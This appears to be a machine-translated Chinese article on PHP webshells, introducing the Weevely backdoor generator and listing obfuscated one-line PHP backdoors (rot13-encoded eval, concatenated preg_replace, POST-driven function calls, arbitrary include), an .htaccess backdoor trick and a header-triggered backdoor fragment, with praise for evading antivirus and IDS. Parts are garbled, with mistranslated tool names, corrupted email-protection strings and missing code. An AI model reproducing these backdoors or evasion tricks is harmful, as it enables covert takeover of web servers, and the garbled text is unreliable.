PHP侧门生成工具weevely
Weevely 是 PHP 的 webshell 的免费软件。 它可以用来模拟类似于telnet的连接shell。 Weevely 一般用于利用 Web 程序中的漏洞、隐藏侧门或使用类似 telnet 的形式来替代网页管理。 weevely生成的服务器端PHP代码是base64编码的,因此可以欺骗主流的杀毒软件和IDS。 上传服务器端代码后,一般可以直接通过weevely运行。
weevely生成的PHP侧门采用了比较主流的base64加密结合字符串转换技术。 后门使用的函数都是常用的字符串处理函数。 用作检测规则的eval、system等函数不会直接出现在代码中php木马检测,这会导致侧门文件绕过侧门搜索工具的检测。 使用暗黑组织的网页侧门防病毒工具进行扫描,结果显示该文件不包含任何威胁。
以上是粗略的介绍,以下是截图。 一加这里就不介绍相关的使用方法了,只是简单的普及一下。
一句话PHP木马的三种变体
第一的
砍刀里写的密码是1
第二
在砍刀中写入($_POST['pass']),密码为pass。
如果使用斧头的附加数据,会更加隐蔽,或者可以使用其他注入工具,因为是邮寄提交的。
第三
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e',[emailprotected]str_rot13('riny').'($b4dboy)', 'add');
str_rot13('riny')就是编码后的eval,完全避免了关键字又不失功效,让人吐血!
.htaccess 作为 PHP 侧门
这好像是作者GaRY在2007年就曝光过的,不过后来就没人关注了。 这个帮助的重点就在于一句话:
AddType application/x-httpd-php .htaccess###### SHELL ###### 在这里写下你的侧门###### LLEHS ######
toby57分析加密句子木马
这个侧门的使用方式会和其他方法有所不同。 详细信息请参见下文。
客户:
服务器:
}$out = "GET /php_muma/client.php HTTP/1.1rn";$out .= "内容类型:application/x-www-form-urlencodedrn";$out .= "用户代理:MSIErn";$out .= "主机:127.0.0.1rn";$out .= "H0ST: qiushui51arn";$out .= "X: .. /shell.php rn";$out .= "Y: rn";$out .= "连接: 关闭rnrn";fwrite($fp,$out); while(!feof($fp)){$resp_str="";$resp_str .= fgets($fp,512);//返回值加载到$resp_str中
}fclose($fp);echo($resp_str);//处理返回值。
比较服务器和客户端指令,如果匹配php木马检测,则执行侧门指令。
最后列出一些中级PHP一句话木马侧门。
1. $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"." e";$hh("/[discuz]/e",$_POST['h'],"Access");//菜刀里的一句话
2、$filename=$_GET['xbid'];include($filename);//危险的include函数,直接编译任意文件以php格式运行
3. $reg="c"."o"."p"."y";$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任意文件
4. $gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"." e";$gzid("/[discuz]/e",$_POST['h'],"Access");//菜刀里的一句话
5.include($uid);//危险的include函数,直接编译任意文件以php格式运行,POST
//gif插入一句话
6.典型句子
程序侧门代码 程序代码
//容错代码
代码
//使用lanker句子客户端的专家模式执行相关php句子
程序代码$_POST['sa']($_POST['sb']);?>程序代码$_POST['sa']($_POST['sb'],$_POST['sc'])?>程序代码
//用了这个之后,在配置连接的时候,用柴刀在“配置”栏输入一句话。
程序代码[emailprotected]_r($_POST1);程序代码
//旁路
